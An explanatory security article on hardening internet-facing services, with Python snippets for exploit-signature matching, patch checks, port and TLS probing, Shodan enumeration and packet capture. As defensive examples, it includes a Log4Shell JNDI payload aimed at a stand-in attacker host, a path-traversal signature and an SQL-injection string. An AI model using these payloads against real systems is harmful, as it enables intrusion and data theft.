Internet

The internet is an unforgiving place, where vulnerable servers are located and exploited quickly. Besides the ordinary bots that scan the internet for weak configurations, others locate specific services and have a list of exploits for particular versions.

Also, when a new vulnerability becomes known, e.g. when the vendor issues a public patch, that patch is reverse engineered and converted into an exploit. So your patch cycle must be quicker than that, or you need some system that detects and blocks specific exploits until you have time to patch your systems. It is common to have signatures for an exploit before an actual patch is available.
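
Such signature-based blocking (often called virtual patching) usually lives in an IDS/IPS or a web application firewall. As a minimal sketch of the idea in Python, the following matches incoming requests against a list of exploit signatures; the two signatures are rough placeholders modelled on well-known attacks, not production rules.

    import re

    # Placeholder signatures, loosely modelled on well-known exploits.
    # Real rule sets (e.g. Snort/Suricata) are far more precise than this.
    SIGNATURES = [
        (re.compile(rb"/cgi-bin/\.%2e/"), "Apache path traversal (CVE-2021-41773 style)"),
        (re.compile(rb"\$\{jndi:(ldap|rmi)://", re.I), "Log4Shell-style JNDI lookup"),
    ]

    def blocked_by(raw_request: bytes):
        """Return the name of the matching signature, or None if none match."""
        for pattern, name in SIGNATURES:
            if pattern.search(raw_request):
                return name
        return None

    probe = b"GET /?q=${jndi:ldap://evil.example/a} HTTP/1.1\r\n\r\n"
    print(blocked_by(probe))  # -> Log4Shell-style JNDI lookup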

Some attackers are organizations, some are script kiddies; some are targeting you specifically, some are targeting a region, an industry or just one specific service. This mix makes it impossible to prevent all of them: law enforcement simply doesn't have the capacity (or focus) to handle it all, the legal frameworks are weak, or the attacker is in a country where the activity is legal or tolerated.

In conclusion, these attacks will continue forever, and you, as someone who exposes a service, must secure your part of the internet. It should be mandatory for services directly on the internet to be hardened and patched at regular intervals.
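
To keep such a patch cycle honest, it helps to have something that nags you. The sketch below, which assumes a Debian/Ubuntu host and the stock apt tooling, can run from cron and exit non-zero when security updates are pending:

    import subprocess
    import sys

    # "apt list --upgradable" lists packages with newer versions available.
    result = subprocess.run(
        ["apt", "list", "--upgradable"],
        capture_output=True, text=True, check=True,
    )

    # Packages coming from a *-security pocket are the ones you cannot postpone.
    pending = [line for line in result.stdout.splitlines() if "-security" in line]

    if pending:
        print(f"{len(pending)} pending security update(s):")
        print("\n".join(pending))
        sys.exit(1)  # non-zero exit so cron or your monitoring can alert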

In general, some protocols should never end up on the internet. CIFS (Windows shares), OSPF (dynamic routing) and other protocols are simply not designed for such a hostile environment. They might be enclosed in an encrypted tunnel between two locations, but never exposed in plaintext. This also rules out unencrypted tunnels.
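
A hedged sketch of checking for this: probe your own public addresses for ports that have no business being reachable from the internet. The addresses below are placeholders from the documentation range, and the port list covers a few classic offenders (OSPF runs directly on IP protocol 89 and needs a different kind of check).

    import socket

    # Placeholder addresses (TEST-NET-3); substitute your own public ranges.
    MY_HOSTS = ["203.0.113.10", "203.0.113.11"]

    # TCP ports for protocols that should never face the internet in plaintext.
    RISKY_PORTS = {445: "SMB/CIFS", 139: "NetBIOS", 23: "telnet", 3389: "RDP"}

    for host in MY_HOSTS:
        for port, name in RISKY_PORTS.items():
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.settimeout(2)
                if s.connect_ex((host, port)) == 0:  # 0 means connect succeeded
                    print(f"WARNING: {host}:{port} ({name}) is reachable")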

Other protocols have been on the internet forever and have well-known behavior and vulnerabilities. Protocols like HTTP, DNS and SMTP have their origins from before everybody was online. They have been upgraded over the years, and all of them have TLS counterparts (HTTPS, DNS over TLS, SMTP over TLS).
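
Checking that the TLS counterparts actually answer can be scripted with the standard library alone. A minimal sketch, assuming a placeholder hostname and the standard ports for HTTPS, DNS over TLS and implicit-TLS SMTP:

    import socket
    import ssl

    HOST = "example.com"  # placeholder; only test hosts you operate

    # Standard TLS ports for the classic trio.
    TLS_PORTS = {443: "HTTPS", 853: "DNS over TLS", 465: "SMTPS"}

    context = ssl.create_default_context()

    for port, name in TLS_PORTS.items():
        try:
            with socket.create_connection((HOST, port), timeout=3) as raw:
                with context.wrap_socket(raw, server_hostname=HOST) as tls:
                    print(f"{name}: handshake OK, {tls.version()}")
        except (OSError, ssl.SSLError) as exc:
            print(f"{name}: no usable TLS on port {port} ({exc.__class__.__name__})")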

There is also a fundamental difference in the mindset of the programmers of "internal" and "external" services. If programmers know that a service is intended to be exposed on the internet, most will include security in their design and add at least basic hardening. For some reason, this does not seem to be true for web apps, where even the most common vulnerability classes (the OWASP Top Ten) are routinely built in, leaving the software vulnerable.
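
The classic example from that list is SQL injection, which boils down to concatenating user input into a query instead of parameterizing it. A self-contained illustration, using an in-memory SQLite database and made-up data:

    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'hunter2')")

    user_input = "' OR '1'='1"  # a classic injection payload

    # Vulnerable: user input concatenated straight into the SQL string.
    rows = conn.execute(
        "SELECT * FROM users WHERE name = '" + user_input + "'"
    ).fetchall()
    print("injected query returned:", rows)  # leaks every row

    # Hardened: parameterized query; the driver keeps data and code separate.
    rows = conn.execute(
        "SELECT * FROM users WHERE name = ?", (user_input,)
    ).fetchall()
    print("parameterized query returned:", rows)  # returns nothing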

The concept used here is "attack surface". As the CIS Critical Controls say, you must know which devices you have and what software is running on them. It is common, especially for large organizations, to expose services to the internet that they are unaware of. Especially in a merger situation, where two companies merge into one, we see a lot of services without an owner, simply forgotten. The widespread use of cloud infrastructure makes this even more pronounced.

There are scanners on the internet that may help you with enumerating your attack surface. Shodan is one; SecurityTrails' ASI is another example.
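
Shodan also has an API with a Python client, so the enumeration can be automated. A minimal sketch of listing what Shodan sees as belonging to your organization, with the API key and the query string as placeholders:

    import shodan  # pip install shodan

    api = shodan.Shodan("YOUR_API_KEY")  # placeholder key

    # Placeholder query: adjust "Example Corp" to how Shodan names your org.
    results = api.search('org:"Example Corp"')

    print(f"{results['total']} exposed services found")
    for match in results["matches"]:
        print(match["ip_str"], match["port"], match.get("product", "?"))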

In summary, if you must put something directly on the internet, use services that are designed for it. Harden and monitor the server, and consider collecting all the traffic going in and out, so you have something to analyze when things go wrong.
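
Full-packet capture is usually done with tcpdump or a dedicated sensor, but the idea fits in a few lines of Python with Scapy. A rough sketch, assuming Scapy is installed, the interface name is right for your server, and the script runs with capture privileges:

    import time
    from scapy.all import sniff, wrpcap  # pip install scapy; needs root to capture

    IFACE = "eth0"  # placeholder interface name

    while True:
        # Capture in five-minute slices so the pcap files stay manageable.
        packets = sniff(iface=IFACE, timeout=300)
        filename = time.strftime("traffic-%Y%m%d-%H%M%S.pcap")
        wrpcap(filename, packets)
        print(f"wrote {len(packets)} packets to {filename}")

The resulting pcap files can then be fed to Wireshark or Zeek when an incident needs analyzing.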